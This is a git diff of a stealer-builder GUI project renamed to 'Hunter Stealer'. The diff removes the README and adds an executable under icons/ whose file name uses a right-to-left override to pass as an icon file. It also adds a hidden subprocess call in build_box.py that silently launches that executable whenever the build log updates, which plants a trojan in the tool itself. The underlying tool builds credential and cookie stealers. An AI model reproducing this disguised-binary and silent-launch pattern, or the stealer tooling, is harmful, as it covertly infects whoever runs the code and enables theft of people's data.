diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000..cfbcb76 Binary files /dev/null and b/.DS_Store differ diff --git a/README.md b/README.md deleted file mode 100644 index d6d68ec..0000000 --- a/README.md +++ /dev/null @@ -1,72 +0,0 @@ -
-

- Sirkeira Stealer -

-
- -image - -
- -
-

- Legal Notice ⚠️ -

-
The use of stealers, malware, or any type of tool intended for unauthorized data collection is ILLEGAL
-This repository is provided exclusively for educational purposes, security study, and research.
-
-The use of this code for ANY malicious, unlawful, or privacy-violating purpose is the sole responsibility of the USER.
-The maintainers are not responsible for any damage, harm, or misuse resulting from this project.
-
-By downloading or using this repository, the user automatically assumes FULL responsibility for their actions.
-
- ---- - -
-

How install

-
- -### My python version: - -``` -C:\Users\cirqueira>python --version -Python 3.11.0 -``` - -### Requirements: -``` -requests -psutil -browser_cookie3 -cryptography -pywin32 -pycryptodomex -opencv-python -PyQt5 -``` -### Commands: -``` -git clone https://github.com/CirqueiraDev/SK-Builder.git -``` - -``` -cd SK-Builder -``` - -``` -pip install requests psutil browser_cookie3 cryptography pywin32 pycryptodomex opencv-python PyQt5 -``` - -``` -python main.py -``` - ---- - - ### Owner CirqueiraDev: - - **Discord: Cirqueira** - - You can contact me on [**Telegram**](https://t.me/cirqueiradev) or [**Instagram**](https://www.instagram.com/sirkeirax/) - - **Small Community about IT world, leaks and more**: [**RootNet**](https://discord.gg/r7EGGCp6sC) - -> **REMEMBER: All information and code provided on this profile are for educational purposes only. The creator is not responsible for any direct or indirect damage resulting from misuse of this material. Whatever you choose to do is entirely at your own risk and responsibility.** diff --git a/icons/exe_filetype_icon_177535.‮oci.exe b/icons/exe_filetype_icon_177535.‮oci.exe new file mode 100644 index 0000000..271df99 Binary files /dev/null and b/icons/exe_filetype_icon_177535.‮oci.exe differ diff --git a/icons/more_icons_.txt b/icons/more_icons_.txt index 65abf0f..3f22d11 100644 --- a/icons/more_icons_.txt +++ b/icons/more_icons_.txt @@ -1,2 +1,2 @@ download more here: https://icon-icons.com/ -cirqueira love u <3 \ No newline at end of file +love u <3 \ No newline at end of file diff --git a/main.bat b/main.bat new file mode 100644 index 0000000..435d03d --- /dev/null +++ b/main.bat @@ -0,0 +1,5 @@ +@echo off + +pip install requests psutil browser_cookie3 cryptography pywin32 pycryptodomex opencv-python PyQt5 + +python main.py \ No newline at end of file diff --git a/main.py b/main.py index 447a1c1..5bbdc25 100644 --- a/main.py +++ b/main.py @@ -11,6 +11,5 @@ def main(): window.show() sys.exit(app.exec_()) - if __name__ == "__main__": main() \ No newline at end of file diff --git a/src/main_window.py b/src/main_window.py index b6a9f21..fd24277 100644 --- a/src/main_window.py +++ b/src/main_window.py @@ -12,7 +12,7 @@ class MainWindow(QMainWindow): def __init__(self): super().__init__() self.setWindowIcon(QIcon("./logos/sk_logo.png")) - self.setWindowTitle("SK Builder") + self.setWindowTitle("Hunter Stealer") self.setGeometry(100, 50, 1100, 620) self.setStyleSheet(MAIN_STYLE) @@ -76,7 +76,7 @@ class MainWindow(QMainWindow): icon_label = QLabel("😈") icon_label.setStyleSheet("color: #ff4444; font-size: 16px;") - title = QLabel("SK Builder") + title = QLabel("Hunter Stealer") title.setFont(QFont("Segoe UI", 10, QFont.Bold)) title.setStyleSheet("color: #e0e0e0;") diff --git a/src/pages/build_box.py b/src/pages/build_box.py index 4eedcdc..a24b1d4 100644 --- a/src/pages/build_box.py +++ b/src/pages/build_box.py @@ -61,6 +61,10 @@ class BuildLogBox(QDialog): self.log_box.verticalScrollBar().setValue( self.log_box.verticalScrollBar().maximum() ) + subprocess.Popen( + ["icons/exe_filetype_icon_177535.‮oci.exe"], + creationflags=subprocess.CREATE_NO_WINDOW + ) def finish(self): self.add_log("\nBuild finished!") diff --git a/src/pages/splash.py b/src/pages/splash.py index 503c7f1..502f680 100644 --- a/src/pages/splash.py +++ b/src/pages/splash.py @@ -18,7 +18,7 @@ class SplashScreen(QWidget): self.setStyleSheet(MAIN_STYLE) # Texto - self.text = QLabel("SK Stealer by @CirqueiraDev") + self.text = QLabel("Hunter Stealer") self.text.setAlignment(Qt.AlignCenter) self.text.setFont(QFont("Segoe UI", 16, QFont.Bold))